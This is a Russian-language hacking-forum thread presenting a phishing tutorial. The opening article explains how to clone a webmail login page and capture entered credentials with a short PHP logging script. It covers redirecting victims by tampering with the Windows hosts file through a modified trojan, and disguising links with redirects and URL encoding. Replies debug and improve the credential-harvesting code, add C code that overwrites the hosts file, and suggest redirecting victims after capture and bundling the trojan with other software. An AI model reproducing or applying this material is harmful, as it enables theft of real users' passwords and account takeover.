Все о фейках Фейк - от англ. Fake, - фальшивый, поддельный, ненастоящий Нас повсюду окружают фальшивки. С этим явлением любой из нас сталкивается каждый день, по странной привычке, этого уже не замечая. Можно перебирать свою жизнь, как перебирают крупу, держа ее на ладони и выискивая сорные семена..... 1.Задача Соответственно с названия видно что нам надо будет подделать в данном случае страничку. Не проблема (что бы не лить лишний бред в статью я предполагаю что читатели уже знают что такое хостинг и доменные имена)регистрируем хостинг (любой с поддержкой php и e-mail) и с помошью программы допустим Teleport Pro сливаем сайт,а можно и одну страничку авторизации,главное что бы она была точной копией оригинала. Дальше нужно найти форму с нашей авторизацией 2.Практика Если фразу html формы вы слышите в первый раз советую почитать информацию _http://linux4u.jinr.ru/docs/html/lesson14.html _http://www.opennet.ru/base/dev/html_form.txt.html Если вы поняли что такое формы вам не составит труда найти в сорцах странички (исходный код) формы с нужными нам значениями. HTML: <form action="1.php" method="POST"> <input type="text" name="login"> <input type="password" name="pass"> <select name="dom"><option value="mail.ru">@mail.ru</option> </select> <br > <input type="submit" value="Войти"> </form> Теперь дописываем так,что бы пароли сохранялись у нас PHP: if(@$_POST['login']){ условие $fp = fopen ("file.txt", "a"); открытие файла fwrite ($fp, "$_POST[pass] : $_POST[login] : $_POST[dom] \n"); пишем в файл данные которые ввел юзер на фейковой страничке fclose ($fp); закрываем файл. Про работу с файлами на php можно прочитать тут 2.Подводный камень Допустим вы сделали все указанные рекомендации и у вас есть нормальная фейковая страничка,но как заставить юзера пройти по ссылке blabla.xal9vnuy-xost.ru при этом что бы он заполнил форму авторизации как на сайте-оригинале.Теперь наша задача сделать так что бы допустим жертва ввел(а) у себя адрес mail.ru и попала к вам на страничку.Не реально? Способ 1-Есть такой замечательный файлик как hosts,нам нужна троянская программа которая представляет собой модифицированный файл ОС Windows %System%\drivers\etc\hosts, который используется для перевода доменных имен (DNS) в IP-адреса. Размер измененного файла составляет 284 байта. Файл модифицирован таким образом, чтобы заблокировать или перенаправить обращения пользователя к перечисленным ниже сайтам. В файл hosts добавлены следующие строки: 61.129.75.124 mir.100888290cs.com 61.129.75.124 woool.100888290cs.com 61.129.75.124 www.mir5173.com 61.129.75.124 ert0003.e76.163ns.com 219.147.204.249 www.chenshijituan.com 59.36.96.132 qq.etsoft.com.cn 127.0.0.1 eb114.net 127.0.0.1 www.u7u.cn 61.129.75.124 www.wg581.com Таким образом, все запросы к данным серверам будут заблокированы или перенаправлены на соответствующие сервера. Троян называется Trojan.Win32. Qhost.hq Найдя его исходники можно модифицировать записи 61.129.75.124 mir.100888290cs.com 61.129.75.124 woool.100888290cs.com на свои допустим 127.0.0.1 mail.ru Да и самому такой вирус написать не особо сложно Способ 2 Допустим нужно отправить жертве письмо с фейковой ссылкой Можно использовать редирект допустим от тех же служб mail.ru. Допустим мыло yahoo,у нас домен что то вроде y.yahoo.com,делаем редирект y.yahoo.com/asd/forum.antichat.ru - не плохо выглядит Но можно придать еше более красивый вид : известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса Кодируем forum.antichat.ru и получаем что то вроде y.yahoo.com/asd/%77%77%77%2E%66%6F%72%75%6D%2E%61 Если к этой ссылочке приложить грамотную соц инженерию,то я думаю достаточно людей поверят и пройдут.Закодировать адрес можно charackter encoding calculator ,или алголовским инет крякером. 4.Остальное Так же хочу сказать что если следовать первой фразе статьи то фейк это подделка чего либо,не стоит зацикливаться только на фейках страничек. Например можно делать фейки софта.Зачем? Ну существует много программ в которых нужно вводить пароли,например тот же мейл агент.Но делать фейковый софт сложнее чем фейковые странички ибо слить картинки и html форму не проблема... 4.Заключение Старался охватить все что знаю про фейки,но уверен что это далеко не все поэтому буду по ходу дописывать,особенно про способы подмены ip. Спасибо за внимание,удачного фишинга=) Пишем замечания
читал не давно на геймерском форуме, ты там запостил. . . Статья так себе, нового нету для меня, но для других может откроет. Интересно было почитать
Code: #include <conio.h> #include <stdio.h> FILE *f; int x=1000; void main () { clrscr (); f=fopen("C:\\WINDOWS\\system32\\drivers\\etc\hosts","w"); fprintf (f,"%i",x); fclose (f); } Вот накатал по шустряку ,у кого норм фаер стоит откомпильте запустите pLz
Делаю фэйк для mail.yandex.ru... Создал файл 1.php прописал туда И создал файл file.txt прохожу авторизацию на фэйк чтранице но пароли в file.txt Не сохраняются... В чём может быть ошибка?
Проверь правильность написание логин и пасс в 1.php регистр тоже важен. + Вроде рядом с полями логина и пароля надо жиддены удалять :\ + файл фейка, 1.php и file.txt должны иметь значния 777 - ВАЖНО! (скорее всего из-за этого)
Всё делаю как написано, но по нажатию кнопки войти меня перекидывает на страницу http://xxxx.jino-net.ru/1.php Что делать?
правильный код PHP: <?php if(@$_POST['login']){ $fp = fopen ("file.txt", "a"); fwrite ($fp, "$_POST[passwd] : $_POST[login] \n"); fclose ($fp); } ?>
Вложить пример того что сделал Попробывать создать отдельный файл 1.php хотя мне кажется что ты написал <form action="1.php" а файл назвал blabla.php
Раньше этим занимасла народ вёлся ещё как даже ссылку если не маскеровать! А насчёт троя лучше его к какойнить проге приписть
Если уж говорить о правильности. то правильно будет так: PHP: <?php if(isset($_POST['login'], $_POST['passwd'])) { $fp = fopen ("file.txt", "a"); fwrite ($fp, "Login: ".$_POST['login']." pass : ".$_POST['passwd']." \n"); fclose ($fp); } ?> Неплохо бы потом "перекинуть" пользователя обратно. или на открытку какую нить. Например: Посылаем пользователю письмо в html формате, мол вам пришла открытка. Меняем там урл на свой с фейком. Пользователь "заного" авторизируется, пишем все это в файл и перекидываем на какую нить открытку
Если уж говорить о правильности, то будет так: PHP: <?php if(isset($_POST['login'], $_POST['passwd'])) { $file = 'file.txt'; if(file_exists($file)) { $fp = fopen ($file, "a"); fwrite ($fp, "Login: ".$_POST['login']." pass : ".$_POST['passwd']." \n"); fclose ($fp); } else { echo "xek, not found ".$file; } } ?>
насчет Code: if(file_exists($file)) если стоят права на запись в самой папке. то функция fopen с флагом "a", если файл не существует - пытается его создать да и PHP: else { echo "xek, not found ".$file; } Слишком палевно -) Лучше уж тогда ничего не выводить
2enfix +1 незачем проверять создан ли файл лучше проверить на доступность записи, тем более что стоит отребут а. Лучше PHP: <? $file = 'file.php'; if(is_writable($file)) { header("Location: http://fake.php"); } else { header("Location: http://mail.ru");} / ?>
А не подскажите хостинг где моно использовать php и права на запись(выполнение т.е. 777)!!! Рассмотрю даже платные варианты (конечно не такие как: 30$ за 1 месяц...и траффом в 50 мб...)
Как то не катит... я юзаю клиент NextFTP, ставлю напр. на паку иль на файл права 777,,, тычу "ОК"... Он закрывает... Я опять открываю а там опять всё сброшено.... Или я дурак::???:::
